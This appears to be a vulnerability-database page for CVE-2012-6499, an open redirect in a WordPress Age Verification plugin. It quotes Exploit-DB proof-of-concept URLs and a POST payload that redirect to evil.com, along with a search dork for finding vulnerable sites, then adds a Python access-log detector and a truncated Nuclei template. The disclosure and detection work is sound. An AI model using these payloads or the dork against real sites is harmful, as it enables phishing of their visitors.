CVE-2012-6499
Published: 2013-01-12
Priority: P4 28 | medium | 5.8 CVSS 2.0
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 10.60% (95.2th percentile)
Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| age_verification_project | age_verification | <= 0.4 | — |
No detection rules found.
Exploit-DB
WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection
exploitdb·2012-01-10
---
source: https://www.securityfocus.com/bid/51357/info
WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
WordPress Age Verification plugin 0.4 and prior versions are vulnerable.
http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
Exploit-DB
WordPress Plugin Age Verification 0.4 - Open Redirect
exploitdb·2012-01-10
---
# Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
1) Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
The rendered page will provide a link to http://www.evil.com
2) Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
redirect_to: http://www.evil.com
age_day: 1
age_month: 1
age_year: 1970
Direct redirect to http://www.evil.com
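The page lists no detection rule, so here is an added example (not part of the advisories or the plugin) that flags the GET variant in web server access logs: requests to `age-verification.php` whose decoded `redirect_to` names a host outside the site. The Combined Log Format, the `SITE_HOSTS` allow-list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path from the advisory; endswith() also covers WordPress in a subdirectory.
PLUGIN_PATH = "/wp-content/plugins/age-verification/age-verification.php"
# Assumption: the hosts this site legitimately redirects to.
SITE_HOSTS = {"www.example.com", "example.com"}
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def offsite_redirect_target(log_line):
    """Return the off-site redirect_to value sent to the plugin, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    try:
        url = urlsplit(m.group("target"))
    except ValueError:
        return None
    if not url.path.endswith(PLUGIN_PATH):
        return None
    # parse_qs percent-decodes, so http%3A%2F%2F... becomes http://...
    for value in parse_qs(url.query).get("redirect_to", []):
        try:
            host = (urlsplit(value.strip()).hostname or "").lower()
        except ValueError:
            return value  # unparseable destination: surface it for review
        # A host is present for absolute and scheme-relative ("//host/") URLs.
        if host and host not in SITE_HOSTS:
            return value
    return None

def scan(lines):
    """Return (client_ip, redirect_to) for every flagged log line."""
    hits = []
    for line in lines:
        target = offsite_redirect_target(line)
        if target is not None:
            hits.append((line.split()[0], target))
    return hits

# Constructed sample access-log lines (not real traffic).
TS = "[10/Jan/2012:10:00:01 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {TS} "GET {PLUGIN_PATH}?redirect_to=http%3A%2F%2Fwww.evil.com HTTP/1.1" 200 1834',
    f'203.0.113.8 - - {TS} "GET {PLUGIN_PATH}?redirect_to=%2Fshop%2F HTTP/1.1" 200 1790',
    f'203.0.113.9 - - {TS} "GET /blog{PLUGIN_PATH}?redirect_to=%2F%2Fwww.evil.com%2Flogin HTTP/1.1" 200 1840',
    f'203.0.113.10 - - {TS} "POST {PLUGIN_PATH} HTTP/1.1" 302 0',
]
```

The POST variant carries `redirect_to` in the request body, which access logs do not record, so the last sample line is not flagged; covering it requires request-body logging or inspection at a WAF or reverse proxy.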
Nuclei
WordPress Plugin Age Verification v0.4 - Open Redirect
nuclei·CVSS 5.8
Template:
```yaml
id: CVE-2012-6499
info:
  name: WordPress Plugin Age Verification v0.4 - Open Redirect
  author: ctflearner
  severity: medium
  description: |
    Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading
```